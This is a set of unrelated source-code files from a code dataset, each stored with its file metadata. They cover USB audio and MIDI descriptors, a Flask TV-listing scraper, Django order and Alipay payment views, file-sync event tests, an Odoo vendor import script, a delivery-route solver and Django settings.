DescriptorNumber(AudioClassSpecificASInterfaceDescriptorSubtypes.FORMAT_TYPE),\n    \"bFormatType\" / DescriptorNumber(FormatTypes.EXT_FORMAT_TYPE_III),\n    \"bSubslotSize\" / DescriptorField(description=\"number of bytes occupied by one audio subslot (must be 2)\", default=2),\n    \"bBitResolution\" / DescriptorField(description=\"number of effectively used bits out of the available bits in an audio subslot\"),\n    \"bHeaderLength\" / DescriptorField(description=\"size of the packet header in bytes\"),\n    \"bSideBandProtocol\" / DescriptorField(description=\"side band protocol, see SidebandProtocols\", default=SidebandProtocols.PROTOCOL_UNDEFINED)\n)\n\nClassSpecificAudioStreamingIsochronousAudioDataEndpointDescriptor = DescriptorFormat(\n    \"bLength\" / construct.Const(8, construct.Int8ul),\n    \"bDescriptorType\" / DescriptorNumber(AudioClassSpecificDescriptorTypes.CS_ENDPOINT),\n    \"bDescriptorSubtype\" / DescriptorNumber(AudioClassSpecificEndpointDescriptorSubtypes.EP_GENERAL),\n    \"bmAttributes\" / DescriptorField(description=\"bit D7 = 1: only packets with size wMaxPacketSize allowed\", default=0),\n    \"bmControls\" / DescriptorField(description=\"D1..0: pitch control; D3..2: data overrun control; D5..4: data underrun control;\", default=0),\n    \"bLockDelayUnits\" / DescriptorField(description=\"wLockDelay unit: 0: undefined; 1: milliseconds; 2: decoded PCM samples;\", default=0),\n    \"wLockDelay\" / DescriptorField(description=\"the time it takes this endpoint to reliably lock its internal clock recovery 
circuitry. Units see bLockDelayUnits\", default=0)\n)\n\n###################### MIDI #########################\n\nclass MidiStreamingGroupTerminalBlockDescriptorSubtypes(IntEnum):\n GR_TRM_BLOCK_UNDEFINED = 0x00\n GR_TRM_BLOCK_HEADER = 0x01\n GR_TRM_BLOCK = 0x02\n\nclass GroupTerminalBlockType(IntEnum):\n BIDIRECTIONAL = 0x00\n INPUT_ONLY = 0x01\n OUTPUT_ONLY = 0x02\n\nclass GroupTerminalDefaultMidiProtocol(IntEnum):\n USE_MIDI_CI = 0x00\n MIDI_1_0_UP_TO_64_BITS = 0x01\n MIDI_1_0_UP_TO_64_BITS_AND_JRTS = 0x02\n MIDI_1_0_UP_TO_128_BITS = 0x03\n MIDI_1_0_UP_TO_128_BITS_AND_JRTS = 0x04\n MIDI_2_0 = 0x11\n MIDI_2_0_AND_JRTS = 0x12\n\nclass GroupTerminalNumber(IntEnum):\n GROUP_1 = 0x00\n GROUP_2 = 0x01\n GROUP_3 = 0x02\n GROUP_4 = 0x03\n GROUP_5 = 0x04\n GROUP_6 = 0x05\n GROUP_7 = 0x06\n GROUP_8 = 0x07\n GROUP_9 = 0x08\n GROUP_10 = 0x09\n GROUP_11 = 0x0A\n GROUP_12 = 0x0B\n GROUP_13 = 0x0C\n GROUP_14 = 0x0D\n GROUP_15 = 0x0E\n GROUP_16 = 0x0F","sub_path":"usb_protocol/types/descriptors/uac2.py","file_name":"uac2.py","file_ext":"py","file_size_in_byte":19890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"178266729","text":"\"\"\"\nAny config specific to model training step goes here.\n\"\"\"\n\n\n# General configuration\nMONITOR = 'val_loss'\nVAL_SPLIT = 0.2\nLSTM_UNITS = 100\nOPTIMIZER = 'adam'\nEPOCHS = 100\n\n# +\n# Binary classification\n# OUTPUT_SIZE = 1\n# ACTIVATION = 'sigmoid'\n# LOSS_FUNCTION = 'binary_crossentropy'\n# -\n\n# Multi-class classification\nOUTPUT_SIZE = 3\nACTIVATION = 'softmax'\nLOSS_FUNCTION = 'sparse_categorical_crossentropy'\n","sub_path":"model_training/model_training_config.py","file_name":"model_training_config.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"219378547","text":"# coding=utf-8\n'''\nCreated on 31/03/2015\n\n@author: Douglas\n'''\nfrom util import special_character_html\nfrom settings import site, tv_Programs\nfrom flask import Flask, jsonify\n#from BeautifulSoup import BeautifulSoup,Tag\nfrom bs4 import BeautifulSoup\nimport urllib2\n\napp = Flask(__name__)\n\n@app.route('/get-tv-program/<channel>/<date>')\ndef api_get_tv_programs(channel,date):\n dictonary = {\"programs\":[]}\n url = tv_Programs+date.replace('-','/')+\"&canal=\"+channel\n page = urllib2.urlopen(url)\n content = BeautifulSoup(page.read())\n lines = content.findAll('tr')[2:]\n for line in lines:\n data = line.findAll('td')\n time = unicode(data[0].contents[0])\n if data[1].findAll('strong'):\n program_name = unicode(data[1].findAll('strong')[0].contents[0])\n link = data[1].findAll('a')[0].get('href')[12:]\n data = {\"time\":time,\"name\":program_name,\"link\":link}\n dictonary[\"programs\"].append(data)\n #dictonary[time] = [program_name,link]\n response = jsonify(dictonary)\n response.status_code = 200\n return response\n\n@app.route('/get-program/<program>')\ndef api_get_programs(program):\n dictonary = {}\n \n url = site + program\n page = urllib2.urlopen(url)\n content = BeautifulSoup(page.read())\n \n name = special_character_html(content.findAll(\"h1\", attrs={\"class\": \"programa\"})[0].contents[0])\n dictonary['Name'] = name\n dictonary[\"Description\"] = special_character_html(content.findAll(\"div\", attrs={\"class\": \"conteudo central\"})[0].findAll(\"p\")[0].contents[0])\n \n information = content.findAll(\"ul\", attrs={\"class\": \"detalhes\"})[0].findAll(\"li\")\n dictonary['Program_type'] = 
information[0].contents[0].contents[0]\n\n for details in information[1:]:\n key = details.contents[0].contents[0].replace(\":\",\"\")\n value = details.contents[1]\n dictonary[key]=value\n \n response = jsonify(dictonary)\n response.status_code = 200\n return response\n\n\n","sub_path":"api_services.py","file_name":"api_services.py","file_ext":"py","file_size_in_byte":2003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"636736279","text":"from django.http import JsonResponse\nfrom django.shortcuts import render, redirect\n\n# Create your views here.\nfrom django.urls import reverse\n\nfrom CartApp.models import AxfCart\nfrom CartApp.views import get_total_price\nfrom OrderApp.models import AxfOrder, AxfOrderGoods\nfrom alipay import AliPay\nfrom AXF.settings import APP_PRIVATE_KEY_STRING, ALIPAY_PUBLIC_KEY_STRING\n\n\ndef make_order(request):\n userid=request.session.get('userid')\n data={\n 'msg':'ok',\n 'status':200,\n }\n if userid:\n order = AxfOrder()\n order.o_user_id = userid\n carts=AxfCart.objects.filter(c_user_id=userid).filter(c_is_select=True)\n order.save()\n order.axfordergoods_set.first()\n for cart in carts:\n og=AxfOrderGoods()\n og.og_order_id=order.id\n og.og_goods_id=cart.c_goods_id\n og.og_goods_num=cart.c_goods_num\n og.og_total_price=get_total_price(userid)\n print(og.og_total_price)\n og.save()\n for cart in carts:\n cart.delete()\n data['orderid']=order.id\n return JsonResponse(data=data)\n\n else:\n return redirect(reverse('axfuser:login'))\n\n\ndef order_detail(request):\n orderid=request.GET.get('orderid')\n\n if orderid:\n order=AxfOrder.objects.get(pk=orderid)\n total_price = order.axfordergoods_set.first().og_total_price\n print(total_price)\n context={\n 'order':order,\n 'total_price': total_price\n }\n return render(request,'axf/order/order_detail.html',context=context)\n\n\ndef paytest(request):\n alipay = AliPay(\n appid=\"2016101200665438\",\n app_notify_url=None, # 默认回调url\n app_private_key_string=APP_PRIVATE_KEY_STRING,\n # 支付宝的公钥,验证支付宝回传消息使用,不是你自己的公钥,\n alipay_public_key_string=ALIPAY_PUBLIC_KEY_STRING,\n sign_type=\"RSA2\",# RSA 或者 RSA2\n debug=False) # 默认False\n\n # 电脑网站支付,需要跳转到https://openapi.alipay.com/gateway.do? 
+ order_string\n order_string = alipay.api_alipay_trade_page_pay(\n out_trade_no=\"1989\",\n total_amount=100,\n subject=\"hello\",\n return_url=\"https://www.1000phone.com\",\n notify_url=\"https://www.1000phone.com\",\n )\n print(order_string)\n return redirect('https://openapi.alipaydev.com/gateway.do?'+order_string)\n\n\n","sub_path":"Demo/AXF/OrderApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"642889201","text":"import cauldron as cd\nimport plotly.graph_objs as go\nfrom cauldron import plotting\nfrom tracksim.coupling import swing\nfrom tracksim.coupling.plotting import scatter\n\ncd.refresh(swing)\n\ndf = cd.shared.df\nswing_data = swing.compute_many(cd.shared.trials)\nfitness = swing.to_fitness(swing_data)\ndf['swing'] = [fitness[tid] for tid in df.id]\n\ncd.display.plotly(\n data=scatter.create(\n df,\n [swing_data[tid].value for tid in df.id],\n [swing_data[tid].uncertainty for tid in df.id],\n x_column='order'\n ),\n layout=plotting.create_layout(\n title='Normalized Swing by Trial',\n x_label='Trial Index (#)',\n y_label='Swing'\n )\n)\n\ncd.display.plotly(\n data=go.Bar(\n y=df.swing,\n text=df.short_id,\n marker=dict(\n color=df.color\n )\n ),\n layout=plotting.create_layout(\n title='Swing Deviation',\n x_label='Trial Index (#)',\n y_label='Fractional Deviation'\n )\n)\n\n","sub_path":"BEB_500_S3_Coupling_Length/S05-swing.py","file_name":"S05-swing.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"176912897","text":"'''\r\nPython program to print even length words in a string\r\n'''\r\nsentence = \"This is my name vinit and I am a good boy\"\r\nl1 = sentence.split()\r\nl2 =[]\r\nprint(sentence.split())\r\nfor x in l1:\r\n if len(x)%2 == 0:\r\n l2.append(x)\r\n\r\nprint(\"List of the words having Even number\",l2)\r\n","sub_path":"str_5.py","file_name":"str_5.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"502898360","text":"\"\"\"\n@author: Qinjuan Yang\n@time: 2020-10-28 21:03\n@desc: \n\"\"\"\nimport argparse\nimport os\nimport pandas as pd\nimport pickle as pkl\n\nimport torch\n\nfrom logger import get_logger\nfrom model_utils import load_model_config\n\nlogger = get_logger()\n\n\ndef parse_arguments():\n parser = argparse.ArgumentParser(description=\"News Classification\")\n\n # dataset\n parser.add_argument(\n \"--test_path\",\n type=str,\n help=\"path to the test dataset file\"\n )\n\n # embedding\n parser.add_argument(\n \"--embedding_path\",\n type=str,\n default=\"\",\n help=\"pre-trained embedding file\"\n )\n\n # model\n parser.add_argument(\n \"--model\",\n type=str,\n default=\"FastText\",\n help=\"choose a model: TextCNN, TextRNN, FastText. 
default is TextCNN.\"\n )\n\n parser.add_argument(\n \"--model_dir\",\n type=str,\n help=\"Directory to save model\"\n )\n\n parser.add_argument(\n \"--config_dir\",\n type=str,\n help=\"Directory for configuration file.\"\n )\n\n parser.add_argument(\n \"--log_dir\",\n type=str,\n help=\"Directory for log files.\"\n )\n\n args = parser.parse_args()\n logger.info(\"Arguments: {}\".format(args))\n return args\n\n\nif __name__ == '__main__':\n args = parse_arguments()\n\n config = load_model_config(args.config_dir, args.model)\n\n device = torch.device(\"cuda\") if torch.cuda.is_available() else torch.device(\"cpu\")\n\n logger.info(\"Loading data...\")\n test_df = pd.read_csv(args.test_path)\n logger.info(\"Finish loading data with size {}\".format(test_df.shape[0]))\n\n model_path = os.path.join(args.model_dir, \"model_{}.model\".format(args.model))\n\n if args.model == \"FastText\":\n import fasttext\n from model_utils_fasttext import test_model\n\n logger.info(\"Loading model from {}\".format(model_path))\n model = fasttext.load_model(model_path)\n\n logger.info(\"Testing model...\")\n y_pred = test_model(model, X_test=test_df[\"text\"].tolist())\n else:\n from data_utils import build_dataset, build_iterator\n from model_utils import test_model\n\n test_df[\"text_words\"] = test_df[\"text\"].apply(lambda x: x.split())\n vocab2id = pkl.load(open(os.path.join(args.model_dir, \"vocab_{}.vocab\".format(args.model)), \"rb\"))\n data = build_dataset(test_df[\"text_words\"], vocab2id, max_doc_len=config.max_doc_len)\n data_iter = build_iterator(data, config.batch_size, device)\n\n logger.info(\"Loading model from {}\".format(model_path))\n model = torch.load(model_path)\n\n logger.info(\"Testing model...\")\n y_pred = test_model(model, data_iter)\n\n test_df[\"label\"] = y_pred\n test_df[\"label\"].to_csv(\"predict_{}.csv\".format(args.model), index=False, header=\"label\")\n logger.info(\"Finishing predict label for testing data.\")\n\n","sub_path":"src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"560741197","text":"# !/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: Sam Schott (ss2151@cam.ac.uk)\n\n(c) Sam Schott; This work is licensed under a Creative Commons\nAttribution-NonCommercial-NoDerivs 2.0 UK: England & Wales License.\n\n\"\"\"\nfrom maestral.sync.monitor import *\n\n\ndef path(i):\n return f'test_{i}.txt'\n\n# Simple cases\nfile_events_test0 = [\n # created + deleted -> None\n FileCreatedEvent(path(1)),\n FileDeletedEvent(path(1)),\n # deleted + created -> modified\n FileDeletedEvent(path(2)),\n FileCreatedEvent(path(2)),\n]\n\nres0 = [\n # created + deleted -> None\n # deleted + created -> modified\n FileModifiedEvent(path(2))\n]\n\n# Single file events, keep as is\nfile_events_test1 = [\n FileModifiedEvent(path(1)),\n FileCreatedEvent(path(2)),\n FileDeletedEvent(path(3)),\n FileMovedEvent(path(4), path(5)),\n]\n\nres1 = [\n FileModifiedEvent(path(1)),\n FileCreatedEvent(path(2)),\n FileDeletedEvent(path(3)),\n FileMovedEvent(path(4), path(5)),\n]\n\n# Difficult move cases\nfile_events_test2 = [\n # created + moved -> created\n FileCreatedEvent(path(1)),\n FileMovedEvent(path(1), path(2)),\n # moved + deleted -> deleted\n FileMovedEvent(path(1), path(4)),\n FileDeletedEvent(path(4)),\n # moved + moved back -> modified\n FileMovedEvent(path(5), path(6)),\n FileMovedEvent(path(6), path(5)),\n # moved + moved -> deleted + created (this is 
currently not handled as a single moved)\n FileMovedEvent(path(7), path(8)),\n FileMovedEvent(path(8), path(9)),\n]\n\nres2 = [\n # created + moved -> created\n FileCreatedEvent(path(2)),\n # moved + deleted -> deleted\n FileDeletedEvent(path(1)),\n # moved + moved back -> modified\n FileModifiedEvent(path(5)),\n # moved + moved -> deleted + created (this is currently not handled as a single moved)\n FileDeletedEvent(path(7)),\n FileCreatedEvent(path(9)),\n]\n\n# Gedit save event\nfile_events_test3 = [\n FileCreatedEvent('.gedit-save-UR4EC0'), # save new version to tmp file\n FileModifiedEvent('.gedit-save-UR4EC0'), # modify tmp file\n FileMovedEvent(path(1), path(1) + '~'), # move old version to backup\n FileMovedEvent('.gedit-save-UR4EC0', path(1)), # replace old version with tmp file\n]\n\nres3 = [\n FileModifiedEvent(path(1)), # modified file\n FileCreatedEvent(path(1) + '~'), # backup\n]\n\n# macOS safe-save event\nfile_events_test4 = [\n FileMovedEvent(path(1), path(1) + '.sb-b78ef837-dLht38'), # move old version to backup\n FileCreatedEvent(path(1)), # create new version\n FileDeletedEvent(path(1) + '.sb-b78ef837-dLht38'), # delete backup\n]\n\nres4 = [\n FileModifiedEvent(path(1)), # modified file\n]\n\n# Word on macOS created event\nfile_events_test5 = [\n FileCreatedEvent(path(1)),\n FileDeletedEvent(path(1)),\n FileCreatedEvent(path(1)),\n FileCreatedEvent('~$' + path(1)),\n]\n\nres5 = [\n FileCreatedEvent(path(1)), # created file\n FileCreatedEvent('~$' + path(1)), # backup (will be deleted when file is closed)\n]\n\n\ndef test_clean_local_events():\n\n cleaned_file_events_test0 = UpDownSync._clean_local_events(file_events_test0)\n cleaned_file_events_test1 = UpDownSync._clean_local_events(file_events_test1)\n cleaned_file_events_test2 = UpDownSync._clean_local_events(file_events_test2)\n cleaned_file_events_test3 = UpDownSync._clean_local_events(file_events_test3)\n cleaned_file_events_test4 = UpDownSync._clean_local_events(file_events_test4)\n cleaned_file_events_test5 = UpDownSync._clean_local_events(file_events_test5)\n\n assert set(cleaned_file_events_test0) == set(res0)\n assert set(cleaned_file_events_test1) == set(res1)\n assert set(cleaned_file_events_test2) == set(res2)\n assert set(cleaned_file_events_test3) == set(res3)\n assert set(cleaned_file_events_test4) == set(res4)\n assert set(cleaned_file_events_test5) == set(res5)\n","sub_path":"tests/sync/test_monitor.py","file_name":"test_monitor.py","file_ext":"py","file_size_in_byte":3914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"644599765","text":"''' Desenvolva um programa que leia o nome, idade e sexo de 4 pessoas. No final do programa, mostre:\n- A média de idade no grupo.\n- qual o nome do homem mais velho.\n- quantas mulheres tem menos de 20 anos. '''\n\nnome_homem = ''\nhomem_mais_velho = 0\nmulheres_menores = 0\nmedia_idade = 0\nfor pessoas in range(1, 5):\n print(f'========== {pessoas} PESSOA ==========')\n nome = str(input('Digite o nome: '))\n idade = int(input('Digite a idade: '))\n sexo = int(input('[ 1 ] MASCULINO '\n '[ 2 ] FEMININO'\n '\\nDigite o sexo: '))\n media_idade += idade\n\n if sexo == 1:\n if pessoas == 1:\n homem_mais_velho = idade\n nome_homem = nome\n else:\n if idade > homem_mais_velho:\n homem_mais_velho = idade\n nome_homem = nome\n if sexo == 2:\n if idade < 20:\n mulheres_menores += 1\n\nprint(f'A média de idade do grupo é {media_idade / 4}. 
')\nprint(f'O homem mais velho tem {homem_mais_velho} anos, e seu nome é: {nome_homem}.')\nprint(f'Nesse grupo tem(os) {mulheres_menores} mulheres com menos de 20 anos. ')\n","sub_path":"PythonMundoDois/ex056.py","file_name":"ex056.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"211455334","text":"##############################################################################\n# Copyright 2016 Jesse Maarleveld #\n# #\n# Licensed under the Apache License, Version 2.0 (the \"License\"); #\n# you may not use this file except in compliance with the License. #\n# You may obtain a copy of the License at #\n# #\n# http://www.apache.org/licenses/LICENSE-2.0 #\n# #\n# Unless required by applicable law or agreed to in writing, software #\n# distributed under the License is distributed on an \"AS IS\" BASIS, #\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #\n# See the License for the specific language governing permissions and #\n# limitations under the License. #\n##############################################################################\n\n\"\"\"\nThis module takes care of building a AST tree from a source file or string.\n\"\"\"\n\n##############################################################################\n##############################################################################\n# Imports\n##############################################################################\n\nimport collections.abc\nimport typing\n\nfrom ..tools.public import public\nfrom .collectors import PreprocessorMeta, Preprocessor\nfrom .collectors import StatementMeta, Statement\nfrom .expr import compile_expr\n\n##############################################################################\n##############################################################################\n# Base class for all AST objects\n##############################################################################\n\n# ISSUE 001: Move ASTNode class to separate file to avoid circular import\n\nfrom .ast_base import ASTNode\n\n##############################################################################\n##############################################################################\n# Public interface to parsing source\n##############################################################################\n\n\n@public\ndef parse_file(path: str) -> ASTNode:\n \"\"\"Create an AST tree from a source file.\n :param path: Path to source file.\n :return: Created AST tree.\n \"\"\"\n with open(path) as file:\n source = _apply_preprocessors(_line_iterator(file))\n ast = _CompilingScope(source)\n return ast\n\n\n@public\ndef parse_string(source: str) -> ASTNode:\n \"\"\"Create am AST tree from a string containing\n source code.\n :param source: String containing source.\n :return: Created AST tree.\n \"\"\"\n source = _apply_preprocessors(_line_iterator(source.splitlines()))\n ast = _CompilingScope(source)\n return ast\n\n\n##############################################################################\n##############################################################################\n# Compiling support functions\n##############################################################################\n\n\ndef _line_iterator(lines: typing.Iterator[str]) -> typing.Iterator[str]:\n \"\"\"Yield lines of source from 'lines', but strip\n extra whitespace.\n :param lines: lines\n :return: lines\n \"\"\"\n for line in lines:\n yield line.strip()\n\n\ndef 
_apply_preprocessors(source: typing.Iterator[str]) -> typing.Iterator[str]:\n \"\"\"Apply all defined preprocessors to the given source code.\n\n :param source: Source to be processed.\n :return: Processed source.\n \"\"\"\n for preprocessor in PreprocessorMeta.preprocessors:\n result = preprocessor.apply(source)\n if result is NotImplemented:\n raise RuntimeError(\n 'Not working preprocessor: {}'.format(preprocessor))\n elif not result:\n continue\n source = result\n yield from source\n\n\n##############################################################################\n##############################################################################\n# Compiling support classes\n##############################################################################\n\n# Each scope, in the current design this wil mean each function,\n# will be compiled in its own separate compiling space, which\n# remembers all assigned variables in its body and has access to all\n# variables of its parents. This allow for compile-time checking\n# of defined variables and wil help in general code optimization/\n# compilation to static code.\n\n\nclass _CompilingScope(object):\n \"\"\"Space in which a sequence of source lines is compiled,\n see comment above for more information.\n \"\"\"\n\n def __init__(self, source, parents=()):\n self.source = source\n self.parents = parents\n self.variables = set()\n\n def __iter__(self):\n return self\n\n def __next__(self):\n return next(self.source)\n\n def __contains__(self, other):\n return (\n other in self.variables or\n any(other in parent for parent in self.parents)\n )\n\n def compile_source(self):\n raise NotImplementedError\n\n\n##############################################################################\n##############################################################################\n# Preprocessors for comments\n##############################################################################\n\n\n@public\nclass CommentPreprocessor(Preprocessor):\n \"\"\"Strip comments from the code.\n \"\"\"\n\n @staticmethod\n def apply(source: typing.Iterator[str]) -> Preprocessor.ART:\n pass\n","sub_path":"compiler/lan_ast.py","file_name":"lan_ast.py","file_ext":"py","file_size_in_byte":5794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"374737924","text":"#!/usr/bin/python\n\nclass Node:\n def __init__(self, parent, value):\n self.parent = parent\n self.children = []\n self.value = value\n \n def getGraphList(self):\n valueList = []\n\n for el in self.getLastNodes():\n values = []\n el.getParentNodesValues(values)\n valueList.append(values[::-1])\n \n return valueList\n \n def getParentNodesValues(self, nodes):\n if self.parent == None:\n nodes.append(self.value)\n else:\n nodes.append(self.value)\n self.parent.getParentNodesValues(nodes)\n \n def getLastNodes(self):\n nodes = []\n self._getLastNodes(nodes)\n return nodes\n\n def _getLastNodes(self, nodes):\n if len(self.children) == 0:\n nodes.append(self)\n else:\n for el in self.children:\n el._getLastNodes(nodes)\n\n def addChildren(self):\n if self.getSum() < 21:\n for el in range(4, 7):\n newNode = Node(self, el)\n newNode.addChildren()\n self.children.append(newNode)\n \n def getSum(self):\n if self.parent == None:\n return self.value\n else:\n return self.parent.getSum() + self.value\n \n def getValue(self):\n return self.value\n\ndef run():\n for el in range(4, 7):\n startPoint = Node(None, el)\n startPoint.addChildren()\n values = startPoint.getGraphList()\n for 
value in values:\n print(value)\n\nif __name__ == \"__main__\":\n run()\n","sub_path":"minmax/graf.py","file_name":"graf.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"352046908","text":"t=int(input())\n\nfor i in range(t):\n w,x,y,z=map(int,input().split());\n \n if x > w+(y*z):\n print(\"Unfilled\");\n elif x < w+(y*z):\n print(\"overFlow\");\n elif x==w+(y*z):\n print(\"filled\");\n","sub_path":"WATERFLOW.py","file_name":"WATERFLOW.py","file_ext":"py","file_size_in_byte":220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"316961055","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api, exceptions, _\nimport odoo\nimport threading\nimport logging\nimport traceback\nimport xlrd\nimport erppeek\nfrom odoo import SUPERUSER_ID\n_logger = logging.getLogger(__name__)\n\"\"\"\n导入supplier_company,包含supplier_company包含vendor 的信息\n\"\"\"\n\nclass IacVendorPlmImport(models.TransientModel):\n _name = 'iac.vendor.plm.import'\n _description = 'Vendor Plm Import'\n\n @api.model\n def import_xls(self,xls_path):\n workbook = xlrd.open_workbook(xls_path)\n sheet = workbook.sheet_by_index(0)\n self.import_xls_sheet(sheet,1,sheet.nrows-1)\n\n\n def import_xls_sheet(self,sheet, begin, end):\n index = begin\n # 执行导入数据\n while index <= sheet.nrows - 1:\n logging.warn(u'处理第%s个' % (index))\n\n int_global_vendor_id = False\n\n if sheet.cell_value(index, 1):\n domain=[('global_vendor_code', '=', sheet.cell_value(index, 1))]\n object_id=self.env[\"iac.global.vendor\"].search(domain,limit=1)\n if object_id.exists():\n int_global_vendor_id = object_id.id\n object_id.write({\"is_used\":True})\n else:\n logging.error('global_vendor_code not exists:%s' % (sheet.cell_value(index, 1)))\n\n\n if int_global_vendor_id:\n try:\n vendor_plm_vals = {\n 'name': sheet.cell_value(index, 0),\n 'global_vendor_id': int_global_vendor_id,\n 'state': 'done'\n }\n domain=[('name','=',sheet.cell_value(index, 0))]\n vendor_plm_rec=self.env[\"iac.vendor.plm\"].search(domain)\n if not vendor_plm_rec.exists():\n vendor_plm_rec=self.env[\"iac.vendor.plm\"].create(vendor_plm_vals)\n except:\n traceback.print_exc()\n logging.warn(u'No.%s 行异常,global_vendor_code=%s' % (index, sheet.cell_value(index, 1)))\n else:\n logging.warn(u'No.%s 行异常,global vendor不存在,跳过,global_vendor_code=%s' % (index, sheet.cell_value(index, 1)))\n\n index += 1\n\n logging.warn(u'成功创建 %s 个vendor.plm' % (index - 1))\n\n\nif __name__==\"__main__\":\n URL = 'http://localhost:8069'\n DB = 'IAC_DB'\n USERNAME = 'admin'\n PASSWORD = 'iacadmin'\n erp_peek_api = erppeek.Client(URL, DB, USERNAME, PASSWORD)\n model = erp_peek_api.model('iac.vendor.plm.import')\n #model.import_xls('d:\\\\lwt\\\\vendor_data\\\\vendor_plm.xlsx')\n ex_list=model.import_xls('C://iac//data//data_import//vendor_plm.xls')","sub_path":"addons/mk_addons/myaddons/iac_security/import_data/vendor_plm_import.py","file_name":"vendor_plm_import.py","file_ext":"py","file_size_in_byte":2742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"365006958","text":"import os\nimport sys\nsys.path.append('..')\nsys.path.append('../..')\nimport argparse\nimport utils\nimport graph_maker\n#sys.path.append(\"/Users/jordanbyck/anaconda3/lib/python3.6/site-packages/\")\nimport networkx as nx\nimport numpy as np\nimport scipy as sp\nimport matplotlib.pyplot as plt\n# import dwave_networkx as dnx\n# 
import dimod\nimport solver\nimport student_utils\n\n\n\nfrom student_utils import *\n\nif __name__ == \"__main__\":\n solver.solve_some(\"inputs\", \"outputs\")\n\n\n\ndef naiveSolve(list_of_locations, list_of_homes, starting_car_location, adjacency_matrix, params=[]):\n G = student_utils.adjacency_matrix_to_graph(adjacency_matrix)\n print(G)\n return 0\n\ndef tspRepeats(G, start):\n #make a graph out of the matrix\n all_distances = dict(nx.floyd_warshall(G))\n\n #initialize graph of distances (complete graph with shortest paths as edges)\n B = G.copy()\n edges = {\"\"}\n edges.pop()\n for _ in G.nodes:\n for __ in G.nodes:\n if not B.has_edge(_, __) and not __ == _:\n edges.add((_, __, all_distances[_][__]))\n B.add_weighted_edges_from(edges)\n #predecessors = nx.floyd_warshall_predecessor_and_distance(B)\n\n all_distances = dict(nx.floyd_warshall(B))\n\n #creates returner, a two-opt algorithm version of TSP on the shortest paths graph\n returner = two_opt(B)\n\n #shifts the array so the starting node is at the beginning of the array\n def shift(seq, n):\n n = n % len(seq)\n return seq[n:] + seq[:n]\n for _ in range(len(returner)):\n if returner[_] == int(start):\n returner = shift(returner, _)\n finalList = []\n if len(returner) > 0:\n finalList = [returner[0]]\n for i in range(len(returner)-1):\n finalList += nx.shortest_path(G, returner[i], returner[i+1], weight='weight')[1:]\n finalList += nx.shortest_path(G, returner[-1], returner[0], weight='weight')[1:]\n\n return finalList\n\n#copied from internet\ndef two_opt(graph, weight='weight'):\n num_nodes = graph.number_of_nodes()\n tour = list(graph.nodes())\n # min_cost = compute_tour_cost(graph, tour)\n start_again = True\n while start_again:\n start_again = False\n for i in range(0, num_nodes-1):\n for k in range(i+1, num_nodes):\n # 2-opt swap\n a, b = tour[i-1], tour[i]\n c, d = tour[k], tour[(k+1)%num_nodes]\n if (a == c) or (b == d):\n continue\n ab_cd_dist = graph.edges[a, b]['weight'] + graph.edges[c, d]['weight']\n ac_bd_dist = graph.edges[a, c]['weight'] + graph.edges[b, d]['weight']\n if ab_cd_dist > ac_bd_dist:\n tour[i:k+1] = reversed(tour[i:k+1])\n start_again = True\n if start_again:\n break\n if start_again:\n break\n return tour\n\n\n\n\n\n","sub_path":"practiceSolver.py","file_name":"practiceSolver.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"92086063","text":"\"\"\"\nDjango settings for dataproject project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.6/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.6/ref/settings/\n\"\"\"\n\n#for celery use\nfrom __future__ import absolute_import\nfrom datetime import timedelta\n\n#celery settings\n\nCELERY_TASK_RESULT_EXPIRES=3600,\nCELERYBEAT_SCHEDULE = {\n 'get_travel_time-every-30-seconds': {\n 'task': 'traffic.tasks.get_travel_time_tmc',\n 'schedule': timedelta(seconds=30),\n },\n}\n\n#broker url for celery use\nBROKER_URL = 'django://'\n\n#periodical schedules\n\n\n#Django settings\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\n#import kombu\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n# for nginx to server static files\nSTATIC_ROOT = os.path.join(BASE_DIR, \"static/\")\n\n# Tell the server where to find geos library\n# GEOS_LIBRARY_PATH = '/usr/local/lib/libgeos_c.so'\n\n# Quick-start development settings - unsuitable for 
